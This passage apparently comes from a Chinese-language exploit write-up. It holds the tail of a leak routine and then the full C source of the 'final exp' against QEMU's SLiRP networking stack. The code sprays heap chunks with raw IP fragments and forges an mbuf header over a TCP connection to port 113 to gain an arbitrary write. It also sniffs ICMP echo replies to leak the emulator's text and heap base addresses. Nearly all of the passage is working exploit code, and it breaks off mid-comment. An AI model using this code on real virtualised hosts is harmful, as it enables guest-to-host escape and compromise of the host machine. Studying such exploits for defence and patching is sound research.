    pkt_info.MF = 0;
    pkt_info.ip_p = IPPROTO_ICMP;

    // open the sniffing socket before the last fragment goes out
    recvsd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    // last fragment (zero-length data): per the write-up this places the forged ICMP reply at 0xb00
    send_ip_pkt(&pkt_info, payload, 0);
    printf("[+]leaking: Now we have finished writting to target.\nAlso, this means we will get the response packet we want.\n");
    //getchar();

    // we receive data here
    int bytes, status;
    struct ip *recv_iphdr;
    struct icmp *recv_icmphdr;
    uint8_t recv_ether_frame[IP_MAXPACKET];
    struct sockaddr from;
    socklen_t fromlen;
    struct timeval wait, t1, t2;
    struct timezone tz;
    double dt;

    (void)gettimeofday(&t1, &tz);
    // give up when nothing is received for 2 seconds
    wait.tv_sec = 2;
    wait.tv_usec = 0;
    setsockopt(recvsd, SOL_SOCKET, SO_RCVTIMEO, (char *)&wait,
               sizeof(struct timeval));
    // header views into the receive buffer; valid once a frame has been read
    recv_iphdr = (struct ip *)(recv_ether_frame + ETH_HDRLEN);
    recv_icmphdr = (struct icmp *)(recv_ether_frame + ETH_HDRLEN + IP4_HDRLEN);
    int count = 0;
    while (1) {
        memset(recv_ether_frame, 0, IP_MAXPACKET * sizeof(uint8_t));
        memset(&from, 0, sizeof(from));
        fromlen = sizeof(from);
        if ((bytes = recvfrom(recvsd, recv_ether_frame, IP_MAXPACKET, 0,
                              (struct sockaddr *)&from, &fromlen)) < 0) {
            status = errno;
            if (status == EAGAIN) { // EAGAIN = 11
                dbg_printf("No reply within %li seconds.\n", wait.tv_sec);
                exit(EXIT_FAILURE);
            } else if (status == EINTR) { // EINTR = 4
                continue;
            } else {
                perror("recvfrom() failed ");
                exit(EXIT_FAILURE);
            }
        } // End of error handling conditionals.
        // hexdump("recv", recv_ether_frame, 0x50);
        dbg_printf("recv count %d\n", count++);
        // only IPv4 frames carrying an ICMP echo reply are of interest
        if ((((recv_ether_frame[12] << 8) + recv_ether_frame[13]) ==
             ETH_P_IP) &&
            (recv_iphdr->ip_p == IPPROTO_ICMP) &&
            (recv_icmphdr->icmp_type == ICMP_ECHOREPLY)) {
            // Stop timer and calculate how long it took to get a reply.
            (void)gettimeofday(&t2, &tz);
            dt = (double)(t2.tv_sec - t1.tv_sec) * 1000.0 +
                 (double)(t2.tv_usec - t1.tv_usec) / 1000.0;

            dbg_printf("%g ms (%i bytes received)\n", dt, bytes);
#ifdef DEBUG
            hexdump("ping recv", recv_ether_frame, bytes);

#endif
            // replies shorter than 0x200 bytes are skipped
            if (bytes < 0x200)
                continue;
            // qword at frame offset 0x88: minus a fixed offset, rounded down to a page
            text_base =
                ((*(uint64_t *)(recv_ether_frame + 0x88)) - 0x7e7d01) & ~0xfff;
            // qword at frame offset 0x90 with the low 24 bits cleared
            heap_base = (*(uint64_t *)(recv_ether_frame + 0x90)) & ~0xffffff;
            dbg_printf("leak text_base: 0x%lx\n"
                       "leak heap_base: 0x%lx\n",
                       text_base, heap_base);
            // getchar();
            break;
        } // End if IP ethernet frame carrying ICMP_ECHOREPLY
    }

    //getchar();
    close(s);
    close(recvsd);
    free(payload_start);
}

最终exp如下：

#include<stdio.h>
#include<stdlib.h>
#include<sys/socket.h>
#include<netinet/in.h>
#include<arpa/inet.h>
#include <net/if.h>          // struct ifreq
#include<string.h>
#include <netinet/in.h> // IPPROTO_RAW, IPPROTO_IP, IPPROTO_TCP, INET_ADDRSTRLEN
#include <netinet/ip.h> // struct ip and IP_MAXPACKET (which is 65535)
#include <netinet/ip_icmp.h> // struct icmp, ICMP_ECHO
#include<netinet/tcp.h>
#include<net/ethernet.h>
#include<linux/if_ether.h>
#include<linux/if_packet.h>
#include<sys/ioctl.h>
#include<bits/ioctls.h>
#include<sys/time.h>
#include <errno.h>
#include<net/ethernet.h>
#include<netinet/tcp.h>
#include<stdbool.h>
#include<assert.h>
// Define some constants.
#define ETH_HDRLEN 14 // Ethernet header length
#define IP4_HDRLEN 20 // IPv4 header length
#define TCP_HDRLEN 20 // TCP header length, excludes options data
#define ICMP_HDRLEN 8 // ICMP header length for echo request, excludes data

// Name of the network interface the raw sockets are bound to (see spray_chunk).
char interface[] = "enp0s3";
// IPv4 address the TCP connection to port 113 is made to.
char host[] = "10.0.2.2";
// Leaked base addresses; assigned by leak().
uint64_t text_base, heap_base;
// When non-zero, arbitray_write() waits on getchar() before the final fragment.
int stop_flag;
// First IP identification value arbitray_write() uses for its spray packets.
int spray_ip_id = 0x0;
// Opaque placeholder so that struct mbuf can declare its slirp member.
typedef void *Slirp;
/*
 * Local declaration of the mbuf header. Presumably mirrors the layout of
 * QEMU's SLiRP struct mbuf (the field list matches the gdb dump in the
 * write-up) - verify against the targeted QEMU version.
 */
struct mbuf {
    /* XXX should union some of these! */
    /* header at beginning of each mbuf: */
    struct mbuf *m_next; /* Linked list of mbufs */
    struct mbuf *m_prev;
    struct mbuf *m_nextpkt; /* Next packet in queue/record */
    struct mbuf *m_prevpkt; /* Flags aren't used in the output queue */
    int m_flags;            /* Misc flags */
    int m_size;             /* Size of mbuf, from m_dat or m_ext */
    struct socket *m_so;
    caddr_t m_data; /* Current location of data */
    int m_len;      /* Amount of data in this mbuf, from m_data */
    Slirp *slirp;
    bool resolution_requested;
    uint64_t expiration_date;
    char *m_ext;
    /* start of dynamic buffer area, must be last element */
    char m_dat[];
};

// some header info to pass to the send_ip_pkt
struct ip_pkt_info {
    uint16_t ip_id;  // IP identification; callers reuse one id for all fragments of a datagram
    uint16_t ip_off; // fragment offset as given by the caller (encoding is up to send_ip_pkt)
    bool MF;         // true: more fragments follow; false: last fragment
    uint8_t ip_p;    // IP protocol number (callers pass IPPROTO_ICMP or 0xff)
};

/* Print "error: <buf>" on standard output and terminate with exit status -1. */
void Err(char* buf){
    fprintf(stdout, "error: %s\n", buf);
    exit(-1);
}

/*
 * One's-complement checksum over nwords 16-bit words starting at buf.
 * Note that the length is a word count, not a byte count. The words are
 * added in host order, the carries are folded back once and the result is
 * inverted.
 */
unsigned short csum(unsigned short *buf, int nwords)
{
  unsigned long acc = 0;
  const unsigned short *word = buf;

  while (nwords > 0) {
    acc += *word;
    word++;
    nwords--;
  }

  /* fold the upper bits into the low 16, then add the carry of that fold */
  acc = (acc & 0xffff) + (acc >> 16);
  acc += acc >> 16;

  return (unsigned short)~acc;
}

// Build IPv4 TCP pseudo-header and call checksum function.
/*
 * Build the IPv4 TCP pseudo-header followed by the TCP header (checksum field
 * zeroed) and the payload in a scratch buffer, and return its checksum.
 *
 * iphdr      - supplies source/destination address and protocol
 * tcphdr     - TCP header whose fields are serialized; th_sum is ignored
 * payload    - TCP payload, may be NULL when payloadlen is 0
 * payloadlen - payload length in bytes; must be non-negative and small
 *              enough to fit the scratch buffer, otherwise the process exits
 *
 * Returns the value computed by csum() over the padded buffer.
 */
uint16_t tcp4_checksum(struct ip iphdr, struct tcphdr tcphdr, uint8_t *payload,
                       int payloadlen) {
    enum { PSEUDO_HDRLEN = 12 };
    /* uint16_t storage: csum() reads the buffer as 16-bit words. */
    uint16_t words[(IP_MAXPACKET + 1) / 2];
    char *const buf = (char *)words;
    char *ptr = buf;
    uint16_t svalue;
    char cvalue;
    int chksumlen;

    /* pseudo-header + TCP header + payload + one pad byte must fit */
    if (payloadlen < 0 ||
        (size_t)payloadlen > sizeof(words) - PSEUDO_HDRLEN - sizeof(tcphdr) - 1) {
        printf("ERROR: payloadlen = %i out of range in tcp4_checksum().\n",
               payloadlen);
        exit(EXIT_FAILURE);
    }

    /* Pseudo-header: source address, destination address (32 bits each) */
    memcpy(ptr, &iphdr.ip_src.s_addr, sizeof(iphdr.ip_src.s_addr));
    ptr += sizeof(iphdr.ip_src.s_addr);
    memcpy(ptr, &iphdr.ip_dst.s_addr, sizeof(iphdr.ip_dst.s_addr));
    ptr += sizeof(iphdr.ip_dst.s_addr);

    /* zero byte, protocol (8 bits each) */
    *ptr++ = 0;
    memcpy(ptr, &iphdr.ip_p, sizeof(iphdr.ip_p));
    ptr += sizeof(iphdr.ip_p);

    /* TCP length: header plus payload (16 bits) */
    svalue = htons(sizeof(tcphdr) + payloadlen);
    memcpy(ptr, &svalue, sizeof(svalue));
    ptr += sizeof(svalue);

    /* TCP header: ports, sequence and acknowledgement numbers */
    memcpy(ptr, &tcphdr.th_sport, sizeof(tcphdr.th_sport));
    ptr += sizeof(tcphdr.th_sport);
    memcpy(ptr, &tcphdr.th_dport, sizeof(tcphdr.th_dport));
    ptr += sizeof(tcphdr.th_dport);
    memcpy(ptr, &tcphdr.th_seq, sizeof(tcphdr.th_seq));
    ptr += sizeof(tcphdr.th_seq);
    memcpy(ptr, &tcphdr.th_ack, sizeof(tcphdr.th_ack));
    ptr += sizeof(tcphdr.th_ack);

    /* data offset (4 bits) and reserved bits (4 bits) share one byte */
    cvalue = (tcphdr.th_off << 4) + tcphdr.th_x2;
    memcpy(ptr, &cvalue, sizeof(cvalue));
    ptr += sizeof(cvalue);

    /* flags (8 bits), window (16 bits) */
    memcpy(ptr, &tcphdr.th_flags, sizeof(tcphdr.th_flags));
    ptr += sizeof(tcphdr.th_flags);
    memcpy(ptr, &tcphdr.th_win, sizeof(tcphdr.th_win));
    ptr += sizeof(tcphdr.th_win);

    /* checksum field is zero while the checksum is being computed */
    *ptr++ = 0;
    *ptr++ = 0;

    /* urgent pointer (16 bits) */
    memcpy(ptr, &tcphdr.th_urp, sizeof(tcphdr.th_urp));
    ptr += sizeof(tcphdr.th_urp);

    /* payload */
    if (payloadlen > 0) {
        memcpy(ptr, payload, payloadlen);
        ptr += payloadlen;
    }

    /* pad to the next 16-bit boundary */
    if ((ptr - buf) % 2 != 0) {
        *ptr++ = 0;
    }
    chksumlen = (int)(ptr - buf);

    /* csum() expects a count of 16-bit words, not bytes */
    return csum(words, chksumlen / 2);
}

/*
 * Allocate a zero-filled array of len bytes.
 *
 * len must be positive. On a non-positive len or on allocation failure a
 * message is printed and the process exits with EXIT_FAILURE, so the return
 * value is never NULL. The caller owns the memory and releases it with free().
 */
uint8_t * alloc_uint(int len){
    uint8_t *tmp;

    if (len <= 0) {
        printf("ERROR: Cannot allocate memory because len = %i in "
                   "alloc_uint().\n",
                   len);
        exit(EXIT_FAILURE);
    }

    /* calloc() hands back zeroed memory, replacing malloc() + memset() */
    tmp = calloc((size_t)len, sizeof *tmp);
    if (tmp == NULL) {
        printf(
            "ERROR: Cannot allocate memory for array in alloc_uint().\n");
        exit(EXIT_FAILURE);
    }
    return tmp;
}

/*
 * Allocate a zero-filled array of len chars.
 *
 * len must be positive. On a non-positive len or on allocation failure a
 * message is printed and the process exits with EXIT_FAILURE, so the return
 * value is never NULL. The caller owns the memory and releases it with free().
 */
char * alloc_char(int len){
    char* tmp;

    if(len <= 0){
        printf("Error: can't alloc char mem, len=%i in alloc_char\n", len);
        exit(EXIT_FAILURE);
    }

    /* calloc() hands back zeroed memory, replacing malloc() + memset() */
    tmp = calloc((size_t)len, sizeof *tmp);
    if(tmp == NULL){
        printf("Error: can't alloc char mem in alloc_char\n");
        exit(EXIT_FAILURE);
    }
    return tmp;
}

/*
 * Return a freshly allocated array of len ints with every element set to 0.
 * A non-positive len or a failed allocation prints a message and exits with
 * EXIT_FAILURE; the caller frees the result.
 */
int* alloc_int(int len){
    int *arr;
    size_t nbytes;

    if(!(len > 0)){
        printf("Error len <=0 in alloc_int\n");
        exit(EXIT_FAILURE);
    }

    nbytes = len*sizeof(int);
    arr = (int*)malloc(nbytes);
    if(arr == NULL){
        printf("Error: can't alloc int mem in alloc_int\n");
        exit(EXIT_FAILURE);
    }

    memset(arr, 0, nbytes);
    return arr;
}

void spray_chunk(int size, uint16_t ip_id){
    int sock;
    uint8_t *packet;
    char* interface1, *src_ip, *dst_ip;
    struct ifreq ifr;
    struct ip iphdr;
    int * ip_flags, *tcp_flags;
    char* payload;
    int payloadlen;
    int status;
    struct tcphdr tcphdr;
    int i = 0;
    struct sockaddr_in sin;
    const int on = 1;

    packet = alloc_uint(IP_MAXPACKET);
    interface1 = alloc_char(40);
    src_ip = alloc_char(INET_ADDRSTRLEN);
    dst_ip = alloc_char(INET_ADDRSTRLEN);
    ip_flags = alloc_int(4);
    tcp_flags = alloc_int(8);
    payload = alloc_char(IP_MAXPACKET);

    payloadlen = size - 84;

    //Interface to send packet through
    strcpy(interface1, interface);

    //Submit request for a socket descriptor to look up interface
    if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW))<0){
        Err("socket() failed to get sock descriptor for using ioctl()");
        exit(EXIT_FAILURE);
    }

    //use ioctl() to look up interface index which we will use to 
    //bind socket descriptor sd to specified interface with setsockopt() since
    //none of the other arguments of sendto() specify which interface to use
    memset(&ifr, 0, sizeof(ifr));
    snprintf(ifr.ifr_name, sizeof(ifr.ifr_name), "%s", interface1);
    //printf("sock iotcl begin\n");
    if(ioctl(sock, SIOCGIFINDEX, &ifr) < 0){
        Err("ioctl() failed to find interface");
        exit(EXIT_FAILURE);
    }
    close(sock);
    
    //source IPV4 address: you need to fill this out
    strcpy(src_ip, "127.0.0.1");
    strcpy(dst_ip, "127.0.0.1");

    //IPV4 header
    //IPv4 header length (4 bits): Number of 32-bit words in header = 5
    iphdr.ip_hl = IP4_HDRLEN /sizeof(uint32_t);
    //Internet Protocol version (4 bits): IPv4
    iphdr.ip_v = 4;
    //Type of service (8 bits)
    iphdr.ip_tos = 0;
    //Total length of datagram (16 bits): IP header + TCP header + TCP data
    iphdr.ip_len = htons(IP4_HDRLEN + TCP_HDRLEN + payloadlen);
    //ID sequence number (16 bits): unused, since single datagram
    iphdr.ip_id = htons(ip_id);
    //Flags, and Fragmentation offset (3, 13 bits): 0 since single datagram
    // Zero (1 bit)
    ip_flags[0] = 0;
    //Do not fragment flag (1 bit)
    ip_flags[1] = 0;
    //More fragments following flag (1 bit)
    ip_flags[2] = 1;
    // Fragmentation offset (13 bit)
    ip_flags[3] = 0;

    iphdr.ip_off = htons((ip_flags[0] << 15) + (ip_flags[1] << 14) +
                    (ip_flags[2] << 13) + ip_flags[3]);
    //Time-to-live (8 bits): default to maximum value
    iphdr.ip_ttl = 225;
    //Transport layer protocol (8 bits): 6 for TCP
    iphdr.ip_p = IPPROTO_TCP;

    //source IPv4 address (32 bits)
    if((status = inet_pton(AF_INET, src_ip, &(iphdr.ip_src))) != 1){
        printf("inet_pton() failed\n Error message: %s\n", strerror(status));
        exit(EXIT_FAILURE);
    }

    //Destination IPv4 address (32 bits)
    if((status = inet_pton(AF_INET, dst_ip, &(iphdr.ip_dst))) != 1){
        printf("inet_pton() failed\n Error message: %s\n", strerror(status));
        exit(EXIT_FAILURE);
    }

    //IPv4 header checksum (16 bits): set to 0 when calculating checksum
    iphdr.ip_sum = 0;
    iphdr.ip_sum = csum((uint16_t *)&iphdr, IP4_HDRLEN);

    //TCP header
    //Source port number (16 bits)
    tcphdr.th_sport = htons(60);
    //Destination port number (16 bits)
    tcphdr.th_dport = htons(80);
    //Sequence number (32 bits)
    tcphdr.th_seq = htonl(0);
    //Acknowledgement number (32 bits)
    tcphdr.th_ack = htonl(0);
    //Reserved (4 bits): should be 0
    tcphdr.th_x2 = 0;
    //Data offset (4 bits): size of TCP header in 32-bit words
    tcphdr.th_off = TCP_HDRLEN / 4;

    //Flags (8 bits)
    //FIN flag (1 bit)
    tcp_flags[0] = 0;
    //SYN flag (1 bit)
    tcp_flags[1] = 0;
    //RST flag (1 bit)
    tcp_flags[2] = 0;
    //PSH flag (1 bit)
    tcp_flags[3] = 1;
    //ACK flag (1 bit)
    tcp_flags[4] = 1;
    // URG flag (1 bit)
    tcp_flags[5] = 0;
    //ECE flag (1 bit)
    tcp_flags[6] = 0;
    //CWR flag (1 bit)
    tcp_flags[7] = 0;
    tcphdr.th_flags = 0;
    for(i=0; i<8; i++){
        tcphdr.th_flags += (tcp_flags[i] << i);
    }

    //window size (16 bits)
    tcphdr.th_win = htons(65535);
    //Urgent pointer (16 bits): 0 (only valid of URG flag is set)
    tcphdr.th_urp = htons(0);
    //TCP checksum (16 bits)
    tcphdr.th_sum = tcp4_checksum(iphdr, tcphdr, (uint8_t *)payload, payloadlen);

    //prepare packet
    //First part is an IPv4 header
    memcpy(packet, &iphdr, IP4_HDRLEN*sizeof(uint8_t));
    //Next part of packet is upper layer protocol header
    memcpy((packet+IP4_HDRLEN), &tcphdr, TCP_HDRLEN*sizeof(uint8_t));
    //Last part is upper layer protocol data
    memcpy((packet+IP4_HDRLEN+TCP_HDRLEN), payload, payloadlen*sizeof(uint8_t));

    //The kernel os going to prepare layer 2 information (ethernet frame header) for us
    //For that, we need to specify a destination for the kernel in order for it to decide
    //where to send the raw datagram. we fill in a struct in_addr with the desired destination IP address
    //and pass this structure to the sendto() function
    memset(&sin, 0, sizeof(struct sockaddr_in));
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = iphdr.ip_dst.s_addr;

    //submit request for a raw socket descriptor
    if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0){
        Err("socket failed");
        exit(EXIT_FAILURE);
    }

    //ser flag so socket expects us to provide IPv4 header
    if(setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) <0){
        Err("setsockopt() failed to set IP_HDRINCL");
        exit(EXIT_FAILURE);
    }

    //Bind socket to interface index
    if(setsockopt(sock, SOL_SOCKET, SO_BINDTODEVICE, &ifr, sizeof(ifr)) <0){
        Err("setsockopt() failed to bind to interface");
        exit(EXIT_FAILURE);
    }

    //send packet
    if(sendto(sock, packet, IP4_HDRLEN+TCP_HDRLEN+payloadlen, 0, 
                (struct sockaddr *)&sin, sizeof(struct sockaddr)) <0){
        Err("sendto() failed");
        exit(EXIT_FAILURE);
    }

    //closed socket descriptor
    close(sock);
    //Free allocated memory
    free(packet);
    free(interface1);
    free(src_ip);
    free(dst_ip);
    free(ip_flags);
    free(tcp_flags);
    free(payload);
}

// Assemble the bytes an ICMPv4 checksum is computed over and checksum them.
//
// The scratch buffer receives, in order: message type (8 bits), message code
// (8 bits), a zeroed checksum field (16 bits), identifier (16 bits), sequence
// number (16 bits) and then the payload, followed by one zero byte when
// payloadlen is odd so the total length is a multiple of 16 bits.
//
// icmphdr    - header supplying type, code, id and sequence number; the
//              checksum stored in it is ignored.
// payload    - payloadlen bytes placed after the header fields; not read
//              when payloadlen is 0.
// payloadlen - payload size in bytes. The process exits if it is negative or
//              if the assembled data would not fit in the scratch buffer.
//
// Returns the value csum() computes over the assembled buffer.
uint16_t icmp4_checksum(struct icmp icmphdr, uint8_t *payload, int payloadlen) {
    char buf[IP_MAXPACKET];
    char *ptr = buf;
    int chksumlen = 0;
    // type + code + checksum + identifier + sequence number
    const size_t fixed_len = sizeof(icmphdr.icmp_type) + sizeof(icmphdr.icmp_code)
                             + 2 + sizeof(icmphdr.icmp_id) + sizeof(icmphdr.icmp_seq);

    // Refuse lengths that would write past the end of buf.
    if (payloadlen < 0 ||
        fixed_len + (size_t)payloadlen + (size_t)(payloadlen % 2) > sizeof(buf)) {
        fprintf(stderr, "icmp4_checksum: invalid payload length %d\n", payloadlen);
        exit(EXIT_FAILURE);
    }

    // Copy Message Type to buf (8 bits)
    memcpy(ptr, &icmphdr.icmp_type, sizeof(icmphdr.icmp_type));
    ptr += sizeof(icmphdr.icmp_type);
    chksumlen += sizeof(icmphdr.icmp_type);

    // Copy Message Code to buf (8 bits)
    memcpy(ptr, &icmphdr.icmp_code, sizeof(icmphdr.icmp_code));
    ptr += sizeof(icmphdr.icmp_code);
    chksumlen += sizeof(icmphdr.icmp_code);

    // Checksum field (16 bits) is zero while the checksum is being computed
    memset(ptr, 0, 2);
    ptr += 2;
    chksumlen += 2;

    // Copy Identifier to buf (16 bits)
    memcpy(ptr, &icmphdr.icmp_id, sizeof(icmphdr.icmp_id));
    ptr += sizeof(icmphdr.icmp_id);
    chksumlen += sizeof(icmphdr.icmp_id);

    // Copy Sequence Number to buf (16 bits)
    memcpy(ptr, &icmphdr.icmp_seq, sizeof(icmphdr.icmp_seq));
    ptr += sizeof(icmphdr.icmp_seq);
    chksumlen += sizeof(icmphdr.icmp_seq);

    // Copy payload to buf
    if (payloadlen > 0) {
        memcpy(ptr, payload, (size_t)payloadlen);
        ptr += payloadlen;
        chksumlen += payloadlen;
    }

    // Pad to the next 16-bit boundary (at most one byte is ever needed)
    if (payloadlen % 2 != 0) {
        *ptr = 0;
        chksumlen++;
    }

    return csum((uint16_t *)buf, chksumlen);
}

// Print len bytes starting at addr to stdout as a hex dump.
//
// Every row shows the offset of its first byte as four hex digits, up to 16
// bytes as two-digit hex values, and the same bytes as text, where any byte
// outside 0x20..0x7e is shown as '.'. A short final row is padded so that its
// text column lines up with the full rows above it.
//
// Nothing is printed when addr is NULL or len is not positive.
void hexdump(void *addr, int len){
    unsigned char buff[17];
    unsigned char *pc = (unsigned char*)addr;
    int i;

    // Without data there is no row to print (and buff would be uninitialised).
    if(pc == NULL || len <= 0){
        return;
    }

    for(i=0; i<len; i++){
        if((i % 16) == 0){
            // Starting a new row: flush the text column of the previous one.
            if (i != 0){
                printf("  %s\n", buff);
            }
            printf("   %04x ", i);
        }
        printf(" %02x", pc[i]);

        if((pc[i] < 0x20) || (pc[i] > 0x7e)){
            buff[i % 16] = '.'; 
        }
        else{
            buff[i % 16] = pc[i];
        }
        // Keep buff terminated after every byte so it can be printed at any time.
        buff[(i % 16) + 1] = '\0';
    }
    // Each missing byte occupies three columns (" %02x"), so pad with three spaces.
    while((i % 16) != 0){
        printf("   ");
        i++;
    }
    printf("  %s\n", buff);
}

void send_ip_pkt(struct ip_pkt_info* pkt_info, uint8_t *payload,
                int payloadlen){
    int status, sd, *ip_flags, *tcp_flags;
    const int on = 1;
    char* interface1, *src_ip, *dst_ip;
    struct ip iphdr;
    uint8_t *packet;
    struct sockaddr_in sin;
    struct ifreq ifr;

    //Allocate memory for various arrays
    packet = alloc_uint(IP_MAXPACKET);
    interface1 = alloc_char(40);
    src_ip = alloc_char(INET_ADDRSTRLEN);
    dst_ip = alloc_char(INET_ADDRSTRLEN);
    ip_flags = alloc_int(4);
    tcp_flags = alloc_int(8);

    strcpy(interface1, interface);

    if((sd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0){
        Err("socket failed to get socket descriptor in socket");
    }

    memset(&ifr, 0, sizeof(ifr));
    snprintf(ifr.ifr_name, sizeof(ifr.ifr_name), "%s", interface1);
    if(ioctl(sd, SIOCGIFINDEX, &ifr) < 0){
        Err("ioctl failed in send_ip_pkt");
    }
    close(sd);

    strcpy(src_ip, "127.0.0.1");
    strcpy(dst_ip, "127.0.0.1");

    //
    iphdr.ip_hl = IP4_HDRLEN / sizeof(uint32_t);
    iphdr.ip_v = 4;
    iphdr.ip_tos = 0;
    iphdr.ip_len = htons(IP4_HDRLEN + payloadlen);
    iphdr.ip_id = htons(pkt_info->ip_id);
    // Zero (1 bit)
    ip_flags[0] = 0;
    // Do not fragment flag (1 bit)
    ip_flags[1] = 0;
    //More fragments following flag (1 bit)
    ip_flags[2] = pkt_info->MF;
    // Fragmentation offset (13 bits)
    ip_flags[3] = 0;

    iphdr.ip_off = htons((ip_flags[0]<<15) + (ip_flags[1]<<14) + (ip_flags[2])<<13 +
                ip_flags[3] +( pkt_info->ip_off>>3));
    //Time-to-live (8 bits): default to maximum value
    iphdr.ip_ttl = 255;
    //Transport layer protocol (8 bits): 6 for TCP
    //iphdr.ip_p = IPPROTO_TCP
    iphdr.ip_p = pkt_info->ip_p;

    // Source IPv4 address (32 bits)
    if((status = inet_pton(AF_INET, src_ip, &(iphdr.ip_src))) != 1){
        printf("inet_pton() failed\n Error message: %s\n", strerror(status));
        exit(EXIT_FAILURE);
    }

    //Destination IPv4 address (32 bits)
    if((status = inet_pton(AF_INET, dst_ip, &(iphdr.ip_dst))) != 1){
        printf("inet_pton failed\n Error message: %s", strerror(status));
        exit(EXIT_FAILURE);
    }

    //IPv4 header checksum (16 bits): set 0 when calculating checksum
    iphdr.ip_sum = 0;
    iphdr.ip_sum = csum((uint16_t *)&iphdr, IP4_HDRLEN);

    //prepare packet
    // 1st part is an IPv4 header
    memcpy(packet, &iphdr, IP4_HDRLEN*sizeof(uint8_t));
    //last part is upper layer protocol data
    memcpy(packet+IP4_HDRLEN, payload, payloadlen*sizeof(uint8_t));

    //
    memset(&sin, 0, sizeof(struct sockaddr_in));
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = iphdr.ip_dst.s_addr;

    //Submit request for a raw socket descriptor
    if((sd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0){
        Err("socket failed");
    }

    // Set flag so socket expects us to provide IPv4 header
    if(setsockopt(sd, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0){
        Err("setsockopt failed to set IP_HDRINCL");
    }

    //Bind socket to interface index
    if(setsockopt(sd, SOL_SOCKET, SO_BINDTODEVICE, &ifr, sizeof(ifr)) < 0){
        Err("setsockopt() failed to bind to interface");
    }

    // Send packet
    if(sendto(sd, packet, IP_HDRINCL+TCP_HDRLEN+payloadlen, 0,
            (struct sockaddr *)&sin, sizeof(struct sockaddr)) <0){
        Err("sendto failed");
    }

    close(sd);
    free(packet);
    free(interface1);
    free(src_ip);
    free(dst_ip);
    free(ip_flags);
    free(tcp_flags);
}

// Drive the write primitive: make the final IP fragment carry write_data
// after a forged buffer header has been pushed through a TCP connection to
// port 113 of `host`.
//
// Steps, in order:
//   1. call spray_chunk(0x2000, spray_ip_id + i) spray_times times;
//   2. connect a TCP socket to host:113;
//   3. send a first IP fragment (id 0xdead, protocol 0xff, MF set) of
//      0x300+4 bytes;
//   4. write 6 * 0x500 + 1072 filler bytes to the TCP socket, then a forged
//      header whose last field (m_data) holds the low addr_len bytes of addr,
//      least significant byte first;
//   5. send the closing fragment (same id, MF clear, offset 0x300+24) whose
//      payload is write_data.
//
// addr           - value whose low addr_len bytes are placed in m_data.
// addr_len       - number of bytes of addr to send, 0..8.
// write_data     - payload of the closing fragment.
// write_data_len - size of write_data in bytes.
// spray_times    - number of spray_chunk() calls made before connecting.
//
// When the global stop_flag is set, waits for a key press before step 5.
void arbitray_write(uint64_t addr, int addr_len, uint8_t* write_data,
                    int write_data_len, int spray_times){
    int s, len, i;
    struct sockaddr_in ip_addr;
    int ret;
    struct ip_pkt_info pkt_info;
    uint8_t *payload, *payload_start;
    uint32_t *payload32;
    uint64_t *payload64;

    // Validate before anything is sent.
    assert(addr_len >= 0 && addr_len <= 8);

    payload = (uint8_t*)malloc(IP_MAXPACKET);
    if(payload == NULL){
        Err("malloc in arbitray_write");
        exit(EXIT_FAILURE);
    }
    payload_start = payload;
    payload64 = (uint64_t*)payload;

    // Filler bytes; the fill value must be a character, not a string.
    memset(payload, 'a', 0x1000);
    memcpy(payload, "A1ex", 4);

    printf("[+] spray chunk \n");
    for(i=0; i<spray_times; i++){
        printf("spray 0x2000 chunk, id: %d\n", i);
        spray_chunk(0x2000, spray_ip_id+i);
    }
    printf("spray finished\n");

    s = socket(AF_INET, SOCK_STREAM, 0);
    if(s < 0){
        Err("socket in arbitray_write");
        exit(EXIT_FAILURE);
    }
    memset(&ip_addr, 0, sizeof(ip_addr));
    ip_addr.sin_family = AF_INET;
    ip_addr.sin_addr.s_addr = inet_addr(host);
    ip_addr.sin_port = htons(113);  // Identification protocol port
    len = sizeof(struct sockaddr_in);
    printf("connect so_srv malloc\n");
    ret = connect(s, (struct sockaddr*)&ip_addr, len);  //so_srv malloc
    if(ret == -1){
        Err("connect in arbitray_write");
    }

    // First fragment: MF set, so more fragments are announced.
    memset(&pkt_info, 0, sizeof(pkt_info));
    pkt_info.ip_id = 0xdead;
    pkt_info.ip_p = 0xff;
    pkt_info.ip_off = 0;
    pkt_info.MF = 1;
    printf("malloc mbuf 1\n");
    send_ip_pkt(&pkt_info, payload, 0x300+4);
    printf("[+] Now we finished the malloc of so_rcv and the mbuf\n");

    // Filler traffic ahead of the forged header.
    for(i=0; i<6; ++i){
        if(write(s, payload, 0x500) < 0){
            Err("write in arbitray_write");
        }
        printf("send %d complete\n", i+1);
    }
    if(write(s, payload, 1072) < 0){
        Err("write in arbitray_write");
    }

    //actual overflow here: forged chunk header followed by mbuf fields
    *payload64++ = 0;
    *payload64++ = 0x675;   // chunk header
    *payload64++ = 0;       // m_next
    *payload64++ = 0;       // m_prev
    *payload64++ = 0;       // m_nextpkt
    *payload64++ = 0;       // m_prevpkt
    payload32 = (uint32_t *)payload64;
    *payload32++ = 0;       // m_flags
    *payload32++ = 0x608;   // m_size
    payload64 = (uint64_t *)payload32;
    *payload64++ = 0;   // m_so
    payload = (uint8_t *)payload64;
    // Only the low addr_len bytes of m_data are sent, little-endian.
    for(i=0; i<addr_len; ++i){
        *payload++ = (addr>> (i*8)) & 0xff; //m_data
    }
    if(write(s, payload_start, (uint8_t *)payload - payload_start) < 0){
        Err("write in arbitray_write");
    }

    printf("[+]Now we have written faked mbuf struct\n");
    if(stop_flag){
        puts("trigger!");
        getchar();
    }

    // Closing fragment: same id, MF clear, carries the data to be written.
    pkt_info.ip_id = 0xdead;
    pkt_info.ip_off = 0x300 + 24;
    pkt_info.MF = 0;
    pkt_info.ip_p = 0xff;
    send_ip_pkt(&pkt_info, write_data, write_data_len);
    printf("[+]Now we have trigger the written to target addr\n");

    close(s);
    free(payload_start);
}

// Drive the read primitive and derive the globals text_base and heap_base
// from the ICMP echo reply that comes back.
//
// Steps, in order:
//   1. call spray_chunk(0x2000, spray_ip_id + i) 0x20 times;
//   2. connect a TCP socket to host:113;
//   3. send a first ICMP fragment (id 0xdead, MF set) of 0x300+4 bytes;
//   4. write 6 * 0x500 + 1072 filler bytes to the TCP socket, then a forged
